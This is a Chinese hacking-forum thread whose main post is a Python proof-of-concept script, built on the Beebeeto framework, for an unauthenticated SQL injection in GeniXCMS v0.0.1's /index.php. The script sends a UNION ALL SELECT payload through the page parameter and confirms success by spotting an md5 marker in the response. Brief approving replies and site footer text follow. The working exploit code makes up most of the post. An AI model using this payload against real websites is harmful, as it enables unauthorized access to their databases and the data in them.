搜索
红客联盟 - 由08安全团队运营»社区首页 技术攻防 漏洞情报 GeniXCMS v0.0.1 /index.php SQL注入漏洞 POC
查看: 24561|回复: 30

GeniXCMS v0.0.1 /index.php SQL注入漏洞 POC

[复制链接]
C4r1st
  • TA的每日心情
    慵懒
    2022-4-16 15:45

    • 签到天数: 247 天

    [LV.8]以坛为家I
    发表于 2015-3-19 17:04:05 | 显示全部楼层 |阅读模式
    [Python] 纯文本查看 复制代码
    #!/usr/bin/env python
# coding=utf-8

"""
Site: [url]http://www.beebeeto.com/[/url]
Framework: [url]https://github.com/ff0000team/Beebeeto-framework[/url]
"""

import requests

from baseframe import BaseFrame


class MyPoc(BaseFrame):
    poc_info = {
        # poc相关信息
        'poc': {
            'id': 'poc-2015-0067',
            'name': 'GeniXCMS v0.0.1 /index.php SQL INJECTION POC',
            'author': 'ca2fux1n',
            'create_date': '2015-03-11',
        },
        # 协议相关信息
        'protocol': {
            'name': 'http',
            'port': [80],
            'layer3_protocol': ['tcp'],
        },
        # 漏洞相关信息
        'vul': {
            'app_name': 'GeniXCMS',
            'vul_version': ['0.0.1'],
            'type': 'SQL Injection',
            'tag': ['GeniXCMS SQL注入漏洞', '/index.php漏洞', 'php'],
            'desc': 'GeniXCMS v0.0.1 Remote Unauthenticated SQL Injection Exploite',
            'references': ['http://www.exploit-db.com/exploits/36321/',
                           ],
        },
    }

    @classmethod
    def verify(cls, args):
        url = args['options']['target']
        payload = "/genixcms/index.php?page=1' UNION ALL SELECT 1,2,md5('bb2'),4,5,6,7,8,9,10 and 'j'='j"
        verify_url = url + payload
        content = requests.get(verify_url).content
        if args['options']['verbose']:
            print '[*] Request URL: ' + verify_url
        if '0c72305dbeb0ed430b79ec9fc5fe8505' in content:
            args['options']['success'] = True
            args['poc_ret']['vul_url'] = verify_url
        return args

    exploit = verify

if __name__ == '__main__':
    from pprint import pprint

    mp = MyPoc()
    pprint(mp.run())
    回复

    使用道具 举报

    风之琳
  • TA的每日心情
    开心
    2017-8-19 16:33

    • 签到天数: 11 天

    [LV.3]偶尔看看II
    发表于 2015-4-13 16:12:32 | 显示全部楼层
    谢谢分享
    回复 支持 反对

    使用道具 举报

    r00tc4

    该用户从未签到
    发表于 2015-6-28 04:19:17 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    arctic

    该用户从未签到
    发表于 2015-6-29 13:30:41 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    wilist
  • TA的每日心情
    开心
    2016-3-4 11:35

    • 签到天数: 3 天

    [LV.2]偶尔看看I
    发表于 2015-6-29 19:54:40 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    CHRIS

    该用户从未签到
    发表于 2015-6-30 01:52:06 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    HUC-参谋长

    该用户从未签到
    发表于 2015-6-30 03:31:10 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    asion

    该用户从未签到
    发表于 2015-6-30 12:38:15 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    Sty,涛

    该用户从未签到
    发表于 2015-6-30 15:14:49 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    Jack-5

    该用户从未签到
    发表于 2015-7-2 02:50:49 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    返回列表 发帖
    高级模式
    B Color Image Link Quote Code Smilies
    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-23 04:26 , Processed in 0.020843 second(s), 12 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部